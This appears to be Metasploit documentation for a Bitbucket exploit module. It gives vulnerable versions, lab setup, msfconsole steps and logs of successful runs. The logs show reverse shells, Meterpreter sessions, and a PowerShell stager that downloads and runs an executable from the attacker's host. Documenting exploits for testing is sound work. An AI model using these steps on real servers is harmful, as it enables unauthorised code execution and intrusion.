adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/multi/http/bitbucket_env_var_rce.md
T
space-r7 8a76dab0bd update line numbers
2023-03-15 13:24:33 -05:00

12 KiB
Raw Blame History

Vulnerable Application

For various versions of Bitbucket, there is an authenticated command injection vulnerability that can be exploited by injecting environment variables into a user name. This module achieves remote code execution as the atlbitbucket user by injecting the GIT_EXTERNAL_DIFF environment variable, a null character as a delimiter, and arbitrary code into a user's user name. The value (payload) of the GIT_EXTERNAL_DIFF environment variable will be run once the Bitbucket application is coerced into generating a diff.

This module requires at least admin credentials, as admins and above only have the option to change their user name.

The advisory lists the following versions as vulnerable:

* 7.0 to 7.5 (all versions)
* 7.6.0 to 7.6.18
* 7.7 to 7.16 (all versions)
* 7.17.0 to 7.17.11
* 7.18 to 7.20 (all versions)
* 7.21.0 to 7.21.5

If mesh.enabled=false is set in bitbucket.properties:

* 8.0.0 to 8.0.4
* 8.1.0 to 8.1.4
* 8.2.0 to 8.2.3
* 8.3.0 to 8.3.2
* 8.4.0 to 8.4.1

Installation Instructions

  1. Install Git on the target machine
  • For Linux
    • sudo apt install -y git
  • For Windows
    • Download an installer
    • Selecting all defaults should be fine
  1. Download a vulnerable version of Bitbucket. For example, version 7.18.1 can be found here for Linux and here for Windows
  2. For Linux, make sure the resulting bin file is executable and run it. Just double click on the installer file if using Windows
  • chmod +x atlassian-bitbucket-8.3.0-x64.bin && sudo ./atlassian-bitbucket-8.3.0-x64.bin
  1. An installation wizard will pop up. Make sure Install a new instance is checked, then click Next
  2. Check Install a Server instance and click Next
  3. If the default destination directory looks good, click Next
  4. Click Next if the default Bitbucket data directory looks fine
  5. Make sure the Use default HTTP port (7990) selection is checked and click Next
  6. Make sure the Install Bitbucket as a service box is checked and click Next
  7. Click Install if everything looks correct on the summary screen
  8. Once the installation completes, make sure the Would you like to launch Bitbucket option is selected and click Next
  9. Ensure Launch Bitbucket <version> in browser is selected and click Finish
  10. Navigate to the Bitbucket setup page (http://localhost:7990) and select the I need an evaluation license option
  11. If you already have an account, select I have an account; otherwise, create a new account
  12. 'up and running' should be selected on the next page, so click Generate License
  13. Confirm that the prompt gives you the correct server, then click Yes
  14. The license should be entered in the box, so select Next
  15. Finally, set up an administrator account

Note: If an error occurs on the last step, just open a browser and navigate to the setup page at 127.0.0.1:7990. If installing an 8.* version of Bitbucket, you will need to create a bitbucket.properties file at /var/atlassian/application-data/bitbucket/shared. Once created, add the line mesh.enabled=false, save the file, and restart Bitbucket.

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/bitbucket_env_var_rce
  4. Do: set USERNAME <username>
  5. Do: set PASSWORD <pass>
  6. Do: set RHOST <target_ip>
  7. Do: set LHOST <listen_ip>
  8. Do: run
  9. You should get a shell.

Options

USERNAME

Username to authenticate with and has at least admin privileges

PASSWORD

Password to authenticate with

Scenarios

Ubuntu 22.04 x64 - Bitbucket v7.6.17, CMD Target

msf6 > use exploit/multi/http/bitbucket_env_var_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/bitbucket_env_var_rce) > set rhost 192.168.140.149
rhost => 192.168.140.149
msf6 exploit(multi/http/bitbucket_env_var_rce) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/bitbucket_env_var_rce) > set username test
username => test
msf6 exploit(multi/http/bitbucket_env_var_rce) > set password password
password => password
msf6 exploit(multi/http/bitbucket_env_var_rce) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] No accessible repositories. Will attempt to create a repo
[*] Failed to find valid project information. Will attempt to create repo
[*] Project creation was successful
[+] Successfully created repository 'fjNMKiB'
[+] Commits added: 9e03047ab0802438c2058e49ec757a7be8d222eb, f7683fcc92840ff94e609c8b0a99e165edb5aa7d
[*] Sending payload
[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.149:41118) at 2023-03-13 14:04:00 -0500
[*] Changing user name back to 'test'
[+] Repository has been deleted
[+] Project has been deleted

uname -a
Linux gitlab-virtual-machine 5.15.0-58-generic #64-Ubuntu SMP Thu Jan 5 11:43:13 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
id
uid=1001(atlbitbucket) gid=1001(atlbitbucket) groups=1001(atlbitbucket)

Ubuntu 22.04 x64 - Bitbucket v7.6.17, Linux Dropper

msf6 exploit(multi/http/bitbucket_env_var_rce) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
    0   Linux Command
=>  1   Linux Dropper
    2   Windows Dropper


msf6 exploit(multi/http/bitbucket_env_var_rce) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/bitbucket_env_var_rce) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] No accessible repositories. Will attempt to create a repo
[*] Failed to find valid project information. Will attempt to create repo
[*] Project creation was successful
[+] Successfully created repository 'gmoQNc'
[+] Commits added: d355924ddef6869f5bbd7673c2a2d67c14ccd56d, cbd85c6309ab2830455c1796898f9677e10227e5
[*] Sending payload
[*] Using URL: http://192.168.140.1:8080/VtgFQ7yCgjcP
[*] Client 192.168.140.149 (Wget/1.21.2) requested /VtgFQ7yCgjcP
[*] Sending payload to 192.168.140.149 (Wget/1.21.2)
[*] Command Stager progress -  53.04% done (61/115 bytes)
[*] Command Stager progress -  72.17% done (83/115 bytes)
[*] Sending stage (1017704 bytes) to 192.168.140.149
[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.149:50632) at 2023-03-13 14:06:18 -0500
[*] Command Stager progress -  83.48% done (96/115 bytes)
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Changing user name back to 'test'
[+] Repository has been deleted
[+] Project has been deleted

meterpreter > getuid
Server username: atlbitbucket

Windows 10, x64 - Bitbucket v7.18.1, Windows Dropper

msf6 > use exploit/multi/http/bitbucket_env_var_rce 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/bitbucket_env_var_rce) > set rhost 192.168.140.171
rhost => 192.168.140.171
msf6 exploit(multi/http/bitbucket_env_var_rce) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/bitbucket_env_var_rce) > set username admin
username => admin
msf6 exploit(multi/http/bitbucket_env_var_rce) > set password P@ssword
password => P@ssword
msf6 exploit(multi/http/bitbucket_env_var_rce) > set target 2
target => 2
msf6 exploit(multi/http/bitbucket_env_var_rce) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/bitbucket_env_var_rce) > set verbose true
verbose => true
msf6 exploit(multi/http/bitbucket_env_var_rce) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Found version 7.18.1 of Bitbucket
[+] The target appears to be vulnerable.
[*] No accessible repositories. Will attempt to create a repo
[*] Failed to find valid project information. Will attempt to create repo
[*] Retrieving security token
[*] Project creation was successful
[+] Successfully created repository 'GqFji'
[+] Commits added: 99a9d18e3a72d01bbdaac9bd8d84ba97bb3d7dad, 85a051cb3572b13e59816ff51b527706d66ae392
[*] Sending payload
[*] Using URL: http://192.168.140.1:8080/ZOwoRUPRlio
[*] Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile .\\xnbrdApP.exe http://192.168.140.1:8080/ZOwoRUPRlio", ".\\xnbrdApP.exe", "del .\\xnbrdApP.exe"]
[*] Client 192.168.140.171 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237) requested /ZOwoRUPRlio
[*] Sending payload to 192.168.140.171 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237)
[*] Command Stager progress -  75.19% done (97/129 bytes)
[*] Sending stage (175686 bytes) to 192.168.140.171
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.171:51236) at 2023-03-13 14:29:25 -0500
[*] Command Stager progress -  86.05% done (111/129 bytes)
[*] Command Stager progress - 100.00% done (129/129 bytes)
[*] Changing user name back to 'admin'
[*] Attempting to delete repository 'GqFji'
[+] Repository has been deleted
[*] Now attempting to delete project 'eTzDRa'
[+] Project has been deleted

meterpreter > getuid
Server username: DESKTOP-5JSUGC8\atlbitbucket
meterpreter > sysinfo
Computer        : DESKTOP-5JSUGC8
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows

Ubuntu 22.04 x64 - Bitbucket v8.4.0 with mesh.enabled set to false, Linux Dropper

msf6 > use exploit/multi/http/bitbucket_env_var_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/bitbucket_env_var_rce) > set target 1
target => 1
msf6 exploit(multi/http/bitbucket_env_var_rce) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/bitbucket_env_var_rce) > set rhost 192.168.140.149
rhost => 192.168.140.149
msf6 exploit(multi/http/bitbucket_env_var_rce) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/bitbucket_env_var_rce) > set username administrator
username => administrator
msf6 exploit(multi/http/bitbucket_env_var_rce) > set password S3cureP@ssword
password => S3cureP@ssword
msf6 exploit(multi/http/bitbucket_env_var_rce) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Versions 8.* are vulnerable only if the mesh setting is disabled
[+] The target appears to be vulnerable.
[*] No accessible repositories. Will attempt to create a repo
[*] Failed to find valid project information. Will attempt to create repo
[*] Project creation was successful
[+] Successfully created repository 'IuNYsZZPl'
[+] Commits added: 560d760fdcbcf210c2c1b6dd04663381002066e5, 53ada0136f82899451c16a00cb939225dba53336
[*] Sending payload
[*] Using URL: http://192.168.140.1:8080/qt9f0M
[*] Client 192.168.140.149 (Wget/1.21.2) requested /qt9f0M
[*] Sending payload to 192.168.140.149 (Wget/1.21.2)
[*] Command Stager progress -  50.46% done (55/109 bytes)
[*] Command Stager progress -  70.64% done (77/109 bytes)
[*] Sending stage (1017704 bytes) to 192.168.140.149
[*] Meterpreter session 10 opened (192.168.140.1:4444 -> 192.168.140.149:43360) at 2023-03-14 19:00:00 -0500
[*] Command Stager progress -  82.57% done (90/109 bytes)
[*] Command Stager progress - 100.00% done (109/109 bytes)
[*] Changing user name back to 'administrator'
[+] Repository has been deleted
[+] Project has been deleted

meterpreter > getuid
Server username: atlbitbucket
Reference in New Issue View Git Blame Copy Permalink